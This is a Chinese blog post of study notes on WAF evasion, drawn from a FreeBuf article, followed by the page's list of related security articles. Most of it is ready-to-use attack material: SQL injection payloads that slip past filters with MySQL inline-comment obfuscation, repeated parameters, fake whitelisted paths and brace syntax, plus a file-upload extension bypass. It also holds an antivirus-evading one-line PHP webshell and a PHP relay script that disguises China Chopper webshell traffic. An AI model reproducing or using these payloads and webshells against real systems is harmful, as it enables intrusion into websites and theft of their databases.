9-1freebuf学习

最新推荐文章于 2022-06-09 19:00:23 发布
最新推荐文章于 2022-06-09 19:00:23 发布
阅读量630 收藏 2
点赞数
分类专栏: 奇思淫技 文章标签: bypass sql注入 过滤空格
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/108345159
版权

摘要:

sql注入的绕过技巧,关于/!/解除注释和/!50000/混淆绕过,用于360webscan的伪造白名单特殊目录,复参数绕过,过滤select空格可用select’name’绕过,from{x
表名}语法(过滤from空格),文件上传的后缀名绕过:filename="shell’;.php"

新的一个月,从freebuf开始呢
来自freebuf上的一篇与waf斗智斗勇的每一天

https://www.freebuf.com/articles/web/247655.html

首先从sqlmap小技巧开始
利用mysql的注释方式进行绕过,例如网站拦截sleep()函数,可以利用**/!50000sleep(5)/**绕过拦截,接上url就是:

url?id=123 and /*!50000sleep(5)*/
可以执行,就可以继续paylaod:url?id=123/*!50000sleep(5)and*/length(database())=1
url?id=123 and /*!50000sleep(5)and*/left(database(),8)=CHAR(115,105,....)
url?id=123 and /*!and*/length(select /*!50000table_name*//*from*//*information_schema.tables*/limit+0,1))=13

关于waf身份认证阶段的绕过:
伪造搜索引擎
UA直接修改为搜索引擎可以绕过进行sql注入等攻击

伪造白名单特殊目录
对于360webscan,如果目录是admin,dede,install等目录则不做拦截
例如:url/pen/news.php?id=1 union select user,password from mysql.user被360webscan拦截
可以直接改为 url/pen/news.php**/admin**?id=1 union select user,password from mysql.user
或者是直接:/pen/admin/…\news.php?id=1…

直接攻击源站
用于云waf,云waf的原理:将dns解析到云waf,访问网站的流量都要通过指定的dns服务器解析,进行waf过滤,才访问原始服务器

关于数据包解析阶段的绕过:
1.编码绕过
最常见的就是url

2.修改请求方式绕过
通过修改请求方式绕过
3.复参数绕过
例如url?id=1 union select password,username from mysql.user;
可以修改为:url?id=1&id=union&id=select&id=password,username&id=from mysql.user

4.waf触发规则绕过/!/取消注释包含关键字绕过
比较特别的是,可以通过注释包含关键字绕过,使用**/!/**包含关键字,在mysql中/!/是取消注释的内容,
比如:

url?id=1 union select user from mysql.user
可以改为:url?id=1 /*!union*/ /*!select*/ /*!user*/ /*!from*/ mysql.user

在这里插入图片描述

5.//混淆代码绕过
例如:union/*%00*/*50000select*/(database/**/()),(user/**/())
mysql关键字中是不能插入//的,sel//ect 会报错,但是函数名和括号之间可以加入//,像database/**/()是可以执行的
在这里插入图片描述

关于/!/中间的代码是可以执行的,而/!50000select/中的50000是mysql版本号,只要mysql大于这个版本就会执行里面的代码
数据或者函数的周围可以无限镶嵌()
关于%00要利用好

6.特殊字符拼接
例如:url?id=1;exec(‘whoam’+‘i’)

插播一个过狗小马:

<span style="font-size:14px;"><?php $a=$_GET['a'];$a($_POST['cmd']);?></span>

这个不会被杀,但是菜刀连接会被拦截:
于是脚本:

<span style="font-size:14px;"><?php  
$webshell="http://192.168.204.2/pen/1.php?a=assert";//把这里改成你的shell地址  
$webshell=$webshell."&1141056911=base64_decode";  
   
$da=$_POST;  
$data = $da;  
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post,并把base64_decode替换成$_GET[1141056911](  
   
//print_r($data);  
   
$data = http_build_query($data);    
$opts = array (    
'http' => array (    
'method' => 'POST',    
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .    
"Content-Length: " . strlen($data) . "\r\n",    
'content' => $data)  
);  
      
$context = stream_context_create($opts);    
$html = @file_get_contents($webshell, false, $context); //发送post    
echo $html;    
   
   
?> </span>

好了扩展知识结束,回来
用了/!50000混淆payload被拦截后,以下为拦截内容:
大小写混用,url,16进制编码无用
过滤了union select
用union distinct select绕过(distinct:用于选择出不同的列)
过滤select空格
select后面的参数可以用引号包含不加空格
在这里插入图片描述
在这里插入图片描述

过滤空格from
和form挨着的参数用科学计数法可以不加空格
引入1e0表示00,表示空格,这里是用的3e0(但是我并没有成功执行)

过滤from空格
可以使用**from(x 表名}**语法绕过
在这里插入图片描述

在这里插入图片描述

payload:https://www.example.com/a/b/c/id/1) uNiondistinct (select’1’,username,password,3e0from{x user}order by 1 limit 0,1.0

又一个小技巧:
关于POST传参不限制长度,传递100个参数后第101个参数waf不作检测,如下图:

在这里插入图片描述

对于文件上传
第一检测后缀名,检测到php就不放行,第二就是检测文件内容,含有<?php就拦截
1.修改后缀名:利用引号分号和换行进行混淆
filename="shell’;.php"

原作者的这篇waf具有机器学习的功能(是真的牛皮)

ring4ring
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入符号
qq_39654116的博客
01-04 283
注释符 单行注释 单行注释 单行注释 多行(内联)注释 # -- x //x为任意字符 ;%00 /*任意内容*/ # 单行注释,实际渗透中最好用之前用url编码下,效果会更好,编码后的值为 %23 -- - 注意中间的空格 -- +(空格) `` 在bypass一些比较老的waf可能还会有些用 /**/ 多行注释 /*!*/ 内联注释 /*!50000 */ mysql 5通用,带版本内联注释 常用运算符 运算符 说明 运算符 说明 && 与,同and。
命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
qq_51550750的博客
02-14 795
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。 比如PHP中的system,exec,shell_exec等,当用户可以控制命令执行中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 简单举例来说就是,比如想要创建一个目录,可能不会用代码创建,但是知道系统命令是mkdir,借助系统命令mkdir来创建目录。 举例:cp /tmp/sourcefile /app/public
[PHP内核]PHP内核学习(四)------回答PHP的字符串解析特性Bypass([、空格被解析为_,[[只将第一个[解析为_)
Y4tacker的博客
09-27 1207
文章目录写在前面结果演示parse_str处理流程[、空格被解析为_[[只将第一个[解析为_ 写在前面 写这一篇是自己很早之前就很好奇为什么会这样处理,当时没什么能力,今天来尝试分析一下,php底层对其的处理,因为对web的调试比较麻烦,这里用parse_str分析代替,本文先跟踪parse_str流程再解释 结果演示 [被替换为_ test[a[bc被解析为test_a[bc 空格被替换为_ parse_str处理流程 parse_str实现在ext\standard\string.c 首先是初始化
实战 | Bypass云锁MySQL注入总结
yggcwhat
12-26 1776
MySQL特性 空格可以由其它字符替代 select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin 位置① 可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0 可以利用注释符号替换空格:/**/、%23test%0d%0a、 —+a%0d%0a 可以利用数学运算以及数据类型:news_id=1.0,news
CMD命令混淆学习
crowsec
06-09 1561
cmd命令混淆的意义主要是bypass,混淆也不能影响原来的命令执行结果。
工控网络协议模糊测试:用peach对modbus协议进行模糊测试 - FreeBuf互联网安全新媒体平台1
08-03
1、根据协议控制规范或者捕获业控制络协议数据流来构造正常的数据包 2、分析正常协议的字段及其重要性 3、根据分析的协议中不同的数据类型,设计有效地变异策略 4、
钉钉-以数据为中心的安全体系建设-Freebuf.pdf
05-17
FreeBuf数据治理专场-钉钉-以数据为中心的安全体系建设
短视频黑灰产业报告-FreeBuf&威胁猎人.pdf
09-20
短视频黑灰产业报告-FreeBuf&威胁猎人.pdf
船长-Freebuf_企业安全俱乐部_攻防对抗中数据安全的持续优化.pdf
05-17
FreeBuf数据治理专场-企业安全俱乐部_攻防对抗中数据安全的持续优化
Powershell恶意代码的N种姿势 - FreeBuf.pdf
07-23
powershell内网渗透很好的,推荐一下,网络安全从业者,推荐的学习的脚本,在APT渗透测试中也很好
Sql server注入之注入绕过
qq_42990434的博客
12-17 3454
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下M
记一次SQL注入Bypass过程
合天网安学院
10-15 812
点击关注了解更多精彩内容!!前言某日突然对肥宅的生活感到了厌倦,竟连肥宅快乐水喝起来也索然无味,我需要改变!想起胖友几天前发的一个灰色性质网站,正好测试一下打发时间。直入主题,通过访问网...
WAF Bypass数据库特性(MSsql探索篇)
07-02 557
0x01 背景 探索玩了Mysql特性,继续来探索一下MSsql特性。 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和union之间的位置 (1)空白字符 Mssql可以利用的空白字符有:01,0...
Bypass学习基础
KHOST的博客
10-01 2292
一、网站防护分类 1.源码防护: 使用过滤函数对恶意攻击进行过滤,绕过思路: ①大小写替换 ②变换提交方式:如get请求变post/cookie请求绕过 ③编码绕过:url编码、基于语句重叠、注释符等 2.软件WAF: 通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁; 3.硬件WAF: 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于T..
SQL注入及其bypass
qq_45944626的博客
08-24 1538
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
CTF中的Bypass命令执行
D.MIND 的博客
08-03 2406
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
我的WafBypass之道(SQL注入篇)
weixin_34197488的博客
03-19 403
原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的。 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵。 但是积累姿势的过程也是迭代的,那么就有了此文,用来总 结一些学习和培养突破waf的思想。 可能总结的...
mysql bypass_Mysql Bypass小结
weixin_29002209的博客
01-19 184
总结一些Bypass的方法,1. 绕过空格过滤,使用注释/**/来替换绕过安全狗简单的两个方法:/*'+'*//**a*/2、使用大小写绕过某些关键字的过滤SeLeCT * From test Where id=13、编码绕过SELECT * from test1 where name='admin'SELECT * from test1 where name=CHAR(97, 100, 109,...
Bypass D盾_IIS防火墙SQL注入防御(多姿势)
09-14 85
0X01 前言   D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思...
看雪论坛和freebuf
最新发布
09-19
无论是看雪论坛还是freebuf,它们都为广大的网络安全从业者和爱好者提供了非常丰富的学习和交流平台。通过参与这些平台,我们可以不断学习新的安全知识、跟踪最新的安全漏洞、了解攻击技术并分享自己的经验。这些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值